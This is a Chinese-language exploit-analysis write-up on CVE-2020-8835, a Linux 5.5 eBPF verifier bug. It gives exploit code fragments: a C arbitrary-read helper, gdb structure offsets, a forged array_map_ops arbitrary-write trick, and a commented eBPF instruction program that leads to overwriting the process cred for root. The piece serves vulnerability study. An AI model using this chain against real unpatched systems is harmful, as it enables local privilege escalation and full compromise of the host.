CVE-2020-8835 pwn2own 2020 ebpf 通过任意读写提权分析

CVE-2020-8835 pwn2own 2020 ebpf 通过任意读写提权分析
2020-05-07 07:01:00 Author: xz.aliyun.com(查看原文) 阅读量:492 收藏

前言

该漏洞分析和利用思路作者已经公开，并且也有大佬公开了利用（见参考链接），所以本文就不再对漏洞原理进行分析，主要是对通过任意读写来提权的思路进行补充和分析。

环境和exp在附件中，内核版本下载：https://github.com/torvalds/linux/archive/v5.5.tar.gz

越界读写进行信息泄露

mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,key_size,value_size,max_entries,0);

key_size：表示索引的大小范围，key_size=sizeof(int)=4.
value_size：表示map数组每个元素的大小范围，可以任意，只要控制在一个合理的范围
max_entries：表示map数组的大小，编写利用时将其设为1

泄露内核地址

bpf_create_fd 创建的是一整个bpf_array结构，我们传入的数据放在value[] 处

struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    struct bpf_array_aux *aux;
    union {
        char value[];//<--- elem
        void *ptrs[];
        void *pptrs[];
    };
}

value[]在bpf_array整个结构的偏移为0x110，所以*(&map-0x110)为bpf_map的结构地址

struct bpf_map {
    const struct bpf_map_ops *ops;
    struct bpf_map *inner_map_meta;
    void *security;
    enum bpf_map_type map_type;
    //....
    u64 writecnt;
}

bpf_map 有一个const struct bpf_map_ops *ops; 字段，当我们创建的map是BPF_MAP_TYPE_ARRAY 的时候保存的是array_map_ops, array_map_ops 是一个全局变量，可以用于泄露内核地址

泄露map_elem地址

&exp_elem[0]-0x110+0xc0（wait_list）处保存着指向自身的地址，用于泄露exp_elem的地址

(gdb) p/x &(*(struct bpf_array *)0x0)->map.freeze_mutex.wait_list
$9 = 0xc0

利用任意读

通过BPF_OBJ_GET_INFO_BY_FD 命令进行任意读，BPF_OBJ_GET_INFO_BY_FD 会调用bpf_obj_get_info_by_fd：

case BPF_OBJ_GET_INFO_BY_FD:
        err = bpf_obj_get_info_by_fd(&attr, uattr);

#define BPF_OBJ_GET_INFO_BY_FD_LAST_FIELD info.info

static int bpf_obj_get_info_by_fd(const union bpf_attr *attr,
                  union bpf_attr __user *uattr)
{
    int ufd = attr->info.bpf_fd;
    struct fd f;
    int err;

    if (CHECK_ATTR(BPF_OBJ_GET_INFO_BY_FD))
        return -EINVAL;

    f = fdget(ufd);
    if (!f.file)
        return -EBADFD;

    if (f.file->f_op == &bpf_prog_fops)
        err = bpf_prog_get_info_by_fd(f.file->private_data, attr,
                          uattr);
    else if (f.file->f_op == &bpf_map_fops)
        err = bpf_map_get_info_by_fd(f.file->private_data, attr,
                         uattr);
                         ……

之后调用bpf_map_get_info_by_fd：

static int bpf_map_get_info_by_fd(struct bpf_map *map,
                  const union bpf_attr *attr,
                  union bpf_attr __user *uattr)
{
    struct bpf_map_info __user *uinfo = u64_to_user_ptr(attr->info.info);
    struct bpf_map_info info = {};
    u32 info_len = attr->info.info_len;
    int err;

    err = bpf_check_uarg_tail_zero(uinfo, sizeof(info), info_len);
    if (err)
        return err;
    info_len = min_t(u32, sizeof(info), info_len);

    info.type = map->map_type;
    info.id = map->id;
    info.key_size = map->key_size;
    info.value_size = map->value_size;
    info.max_entries = map->max_entries;
    info.map_flags = map->map_flags;
    memcpy(info.name, map->name, sizeof(map->name));

    if (map->btf) {
        info.btf_id = btf_id(map->btf); // 修改map->btf 就可以进行任意读，获得btf_id，在btf结构偏移0x54处
        info.btf_key_type_id = map->btf_key_type_id;
        info.btf_value_type_id = map->btf_value_type_id;
    }

    if (bpf_map_is_dev_bound(map)) {
        err = bpf_map_offload_info_fill(&info, map);
        if (err)
            return err;
    }

    if (copy_to_user(uinfo, &info, info_len) || // 传到用户态的info中，泄露信息
        put_user(info_len, &uattr->info.info_len))
        return -EFAULT;

    return 0;
}

u32 btf_id(const struct btf *btf)
{
    return btf->id;
}
(gdb) p/x &(*(struct btf*)0)->id  #获取id在btf结构中的偏移
$56 = 0x58

(gdb) p/x &(*(struct bpf_map_info*)0)->btf_id #获取btf_id在bpf_map_info中偏移
$57 = 0x40

所以只需要修改map->btf为target_addr-0x58，就可以泄露到用户态info中，泄漏的信息在struct bpf_map_info 结构偏移0x40处，由于是u32类型，所以只能泄露4个字节。

利用代码如下：

static uint32_t bpf_map_get_info_by_fd(uint64_t key, void *value, int mapfd, void *info) 
{
    union bpf_attr attr = {
        .map_fd = mapfd,
        .key = (__u64)&key,
        .value = (__u64)value,
            .info.bpf_fd = mapfd,
            .info.info_len = 0x100,
            .info.info = (__u64)info,
    };

    syscall(__NR_bpf, BPF_OBJ_GET_INFO_BY_FD, &attr, sizeof(attr));
    return *(uint32_t *)((char *)info+0x40);
}

查找task_struct

ksymtab 保存init_pid_ns结构的偏移，init_pid_ns字符串的偏移
kstrtab 保存init_pid_ns的字符串

(gdb) p &__ksymtab_init_pid_ns
$48 = (<data variable, no debug info> *) 0xffffffff822f2578
(gdb) x/2wx 0xffffffff822f2578
0xffffffff822f2578: 0x001527c8  0x0000a1f9
(gdb) x/10s 0xffffffff822f257c+0xa1f9
0xffffffff822fc775 <__kstrtab_init_pid_ns>: "init_pid_ns"
0xffffffff822fc781 <__kstrtabns_kernel_param_unlock>:   ""
(gdb) x/10gx 0xffffffff822f2578+0x001527c8
0xffffffff82444d40 <init_pid_ns>:   0x0000000000000002  0x0080000400000000
0xffffffff82444d50 <init_pid_ns+16>:    0xffff88801e469242  0x0000006f00000000

所以我们通过搜索"init_pid_ns" 字符串可以得到kstrtab_init_pid_ns的地址，之后再通过搜索匹配地址+该地址上四个字节（表示偏移）是否等于kstrtab_init_pid_ns的地址来判断是否为ksymtab_init_pid_ns，此时找到的地址为ksymtab_init_pid_ns+4，减去4就是ksymtab_init_pid_ns，上面有init_pid_ns结构的偏移，与ksymtab_init_pid_ns地址相加就可以得到init_pid_ns结构的地址。

之后通过pid 和 init_pid_ns查找对应pid的task_struct，这里其实就是要理清内核的查找过程，在写利用的时候模拟走一遍。最后找到task_struct中cred位置。
内核是通过find_task_by_pid_ns函数实现查找过程的：

struct task_struct *find_task_by_pid_ns(pid_t nr, struct pid_namespace *ns)
{
    RCU_LOCKDEP_WARN(!rcu_read_lock_held(),
             "find_task_by_pid_ns() needs rcu_read_lock() protection");
    return pid_task(find_pid_ns(nr, ns), PIDTYPE_PID);
}

nr 为当前进程的pid，ns 为init_pid_ns结构地址，我们需要的是idr字段的内容

struct pid *find_pid_ns(int nr, struct pid_namespace *ns)
{
    return idr_find(&ns->idr, nr);
}

lib/idr.c：
void *idr_find(const struct idr *idr, unsigned long id)
{
    return radix_tree_lookup(&idr->idr_rt, id - idr->idr_base);
}

需要获取&idr->idr_rt 和 idr->idr_base

lib/radix-tree.c：
void *radix_tree_lookup(const struct radix_tree_root *root, unsigned long index)
{
    return __radix_tree_lookup(root, index, NULL, NULL);
}

void *__radix_tree_lookup(const struct radix_tree_root *root,
              unsigned long index, struct radix_tree_node **nodep,
              void __rcu ***slotp)
{
    struct radix_tree_node *node, *parent;
    unsigned long maxindex;
    void __rcu **slot;

 restart:
    parent = NULL;
    slot = (void __rcu **)&root->xa_head;
    radix_tree_load_root(root, &node, &maxindex); //将root->xa_head的值赋给node
    if (index > maxindex)
        return NULL;

    while (radix_tree_is_internal_node(node)) {
        unsigned offset;

        parent = entry_to_node(node); // parent = node & 0xffff ffff ffff fffd
        offset = radix_tree_descend(parent, &node, index); //循环查找当前进程的node
        slot = parent->slots + offset; //
        if (node == RADIX_TREE_RETRY)
            goto restart;
        if (parent->shift == 0) // 当shift为0时，退出，说明找到当前进程的node
            break;
    }

    if (nodep)
        *nodep = parent; 
    if (slotp)
        *slotp = slot; 
    return node; 
}

重点看radix_tree_descend函数实现：

RADIX_TREE_MAP_MASK : 0x3f
static unsigned int radix_tree_descend(const struct radix_tree_node *parent, 
            struct radix_tree_node **nodep, unsigned long index)
{
    unsigned int offset = (index >> parent->shift) & RADIX_TREE_MAP_MASK;  // 要读取parent->shift的值，并与0x3f 与计算
    void __rcu **entry = rcu_dereference_raw(parent->slots[offset]);  // 获取parent->slots[offset] 作为下一个node

    *nodep = (void *)entry; //

    return offset; //
}

radix_tree_node的结构如下：

#define radix_tree_node xa_node

struct xa_node {
    unsigned char   shift;      /* Bits remaining in each slot */
    unsigned char   offset;     /* Slot offset in parent */
    unsigned char   count;      /* Total entry count */
    unsigned char   nr_values;  /* Value entry count */
    struct xa_node __rcu *parent;   /* NULL at top of tree */
    struct xarray   *array;     /* The array we belong to */
    union {
        struct list_head private_list;  /* For tree user */
        struct rcu_head rcu_head;   /* Used when freeing node */
    };
    void __rcu  *slots[XA_CHUNK_SIZE];
    union {
        unsigned long   tags[XA_MAX_MARKS][XA_MARK_LONGS];
        unsigned long   marks[XA_MAX_MARKS][XA_MARK_LONGS];
    };
};

获得当前进程的node后就可以通过pid_task获取相应的task_struct：

enum pid_type
{
    PIDTYPE_PID,
    PIDTYPE_TGID,
    PIDTYPE_PGID,
    PIDTYPE_SID,
    PIDTYPE_MAX,
};
type 为PIDTYPE_PID， 值为0

#define hlist_entry(ptr, type, member) container_of(ptr,type,member)

struct task_struct *pid_task(struct pid *pid, enum pid_type type)
{
    struct task_struct *result = NULL;
    if (pid) {
        struct hlist_node *first;
        first = rcu_dereference_check(hlist_first_rcu(&pid->tasks[type]), //获取&pid->tasks[0] 的内容
                          lockdep_tasklist_lock_is_held());
        if (first)
            result = hlist_entry(first, struct task_struct, pid_links[(type)]);// first为pid_links[0]的地址，由此获得task_struct的起始地址
    }
    return result;
}

利用任意写

在exp_elem上填充伪造的array_map_ops，伪造的array_map_ops中将map_push_elem 填充为map_get_next_key ，这样调用map_push_elem时就会调用map_get_next_key ，并将&exp_elem[0]的地址覆盖到exp_map[0]，同时要修改 map 的一些字段绕过一些检查

spin_lock_off = 0
max_entries = 0xffff ffff 
//写入的index要满足(index >= array->map.max_entries), 将map_entries改成0xffff ffff
map_type = BPF_MAP_TYPE_STACK
//map 的类型是BPF_MAP_TYPE_QUEUE或者BPF_MAP_TYPE_STACK时，map_update_elem 会调用map_push_elem

最后调用bpf_update_elem任意写内存

bpf_update_elem->map_update_elem(mapfd, &key, &value, flags) -> map_push_elem(被填充成 map_get_next_key )
 ->array_map_get_next_key

static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)   
{                                                                                   
    struct bpf_array *array = container_of(map, struct bpf_array, map);             
    u32 index = key ? *(u32 *)key : U32_MAX;                                        
    u32 *next = (u32 *)next_key;                                                    

    if (index >= array->map.max_entries) {    //index                                      
        *next = 0;                                                                  
        return 0;                                                                   
    }                                                                               

    if (index == array->map.max_entries - 1)                                        
        return -ENOENT;                                                             

    *next = index + 1;                                                              
    return 0;                                                                       
}

map_push_elem 的参数是value 和 uattr 的 flags, 分别对应array_map_get_next_key 的 key 和 next_key 参数，之后有index = value[0]，next = flags ，最终效果是 *flags = value[0]+1，这里index 和 next 都是 u32 类型，所以可以任意地址写 4个byte。

总结

执行的bpf_insn注释：

r6 保存ctrl_elem的地址，r7保存exp_elem的地址，r8为偏移
ctrl_map 保存输入的偏移，泄露的地址，以及执行覆盖伪造的array_map_ops操作
exp_map 保存伪造的array_map_ops

struct bpf_insn my_prog[] = {

                //-------- ctrl_mapfd
                BPF_LD_MAP_FD(BPF_REG_9,ctrl_mapfd),
                BPF_MAP_GET(0,BPF_REG_8), 
                BPF_MOV64_REG(BPF_REG_6, BPF_REG_0),              /* r_dst = (r0)   */

                BPF_LD_IMM64(BPF_REG_2,0x4000000000),
                BPF_LD_IMM64(BPF_REG_3,0x2000000000),
                BPF_LD_IMM64(BPF_REG_4,0xFFFFffff),
                BPF_LD_IMM64(BPF_REG_5,0x1),

                BPF_JMP_REG(BPF_JGT,BPF_REG_8,BPF_REG_2,5),
                BPF_JMP_REG(BPF_JLT,BPF_REG_8,BPF_REG_3,4),
                BPF_JMP32_REG(BPF_JGT,BPF_REG_8,BPF_REG_4,3),
                BPF_JMP32_REG(BPF_JLT,BPF_REG_8,BPF_REG_5,2),

                BPF_ALU64_REG(BPF_AND,BPF_REG_8,BPF_REG_4),
                BPF_JMP_IMM(BPF_JA, 0, 0, 2),

                BPF_MOV64_IMM(BPF_REG_0,0x0),
                BPF_EXIT_INSN(),

        //-------- exp_mapfd
                BPF_LD_MAP_FD(BPF_REG_9,exp_mapfd),
                BPF_MAP_GET_ADDR(0,BPF_REG_7),
                BPF_ALU64_REG(BPF_SUB,BPF_REG_7,BPF_REG_8), // r7 = r7-0x110

                BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0),    // r7 = &exp_elem[0]-0x110 , 获得array_map_ops的地址
                BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x10), // leak *(&exp_elem[0]-0x110)

                BPF_LDX_MEM(BPF_DW,BPF_REG_0,BPF_REG_7,0xc0), // leak *(&exp_elem[0]-0x110+0xc0) wait_list
                BPF_STX_MEM(BPF_DW,BPF_REG_6,BPF_REG_0,0x18), //泄露 wait_list保存的地址，该地址指向自身，所以此处用于泄露exp_map的地址
                BPF_ALU64_IMM(BPF_ADD,BPF_REG_0,0x50), // r0 = &exp_map[0]，计算前r0和r7的值相同，但为什么用r0计算，因为r0是map中的数据，而r7是指针，不能往map中写指针
        // &ctrl[0]+0x8 -> op
                BPF_LDX_MEM(BPF_DW,BPF_REG_8,BPF_REG_6,0x8),  // r8 = op
                BPF_JMP_IMM(BPF_JNE, BPF_REG_8, 1, 4),

                BPF_STX_MEM(BPF_DW,BPF_REG_7,BPF_REG_0,0), // r7=&exp_elem[0]-0x110，即&exp_map[0]
                BPF_ST_MEM(BPF_W,BPF_REG_7,0x18,BPF_MAP_TYPE_STACK),//map type
                BPF_ST_MEM(BPF_W,BPF_REG_7,0x24,-1),// max_entries
                BPF_ST_MEM(BPF_W,BPF_REG_7,0x2c,0x0), //lock_off

                BPF_MOV64_IMM(BPF_REG_0,0x0),
                BPF_EXIT_INSN(),

        };

所以利用的整体思路是：

通过漏洞，使得传进来的偏移r8检查时为0，而实际为0x110
将&exp_elem[0]-0x110，获得exp_map的地址，exp_map[0] 保存着array_map_ops的地址，可以用于泄露内核地址
&exp_elem[0]-0x110+0xc0（wait_list）处保存着指向自身的地址，用于泄露exp_elem的地址
利用任意读查找init_pid_ns结构地址
利用进程pid和init_pid_ns结构地址获取当前进程的task_struct
在exp_elem上填充伪造的array_map_ops
修改 map 的一些字段绕过一些检查
调用 bpf_update_elem任意写内存
修改进程task_struct 的cred进行提权。

提权效果图

参考链接

https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification
https://www.anquanke.com/post/id/203416
https://github.com/rtfingc/cve-repo/tree/master/0x04-pwn2own-ebpf-jmp32-cve-2020-8835
https://biscuitos.github.io/blog/RADIX-TREE___radix_tree_lookup/
http://sourcelink.top/2019/09/26/linux-kernel-radix-tree-analysis/

文章来源: http://xz.aliyun.com/t/7690
如有侵权请联系:admin#unsafe.sh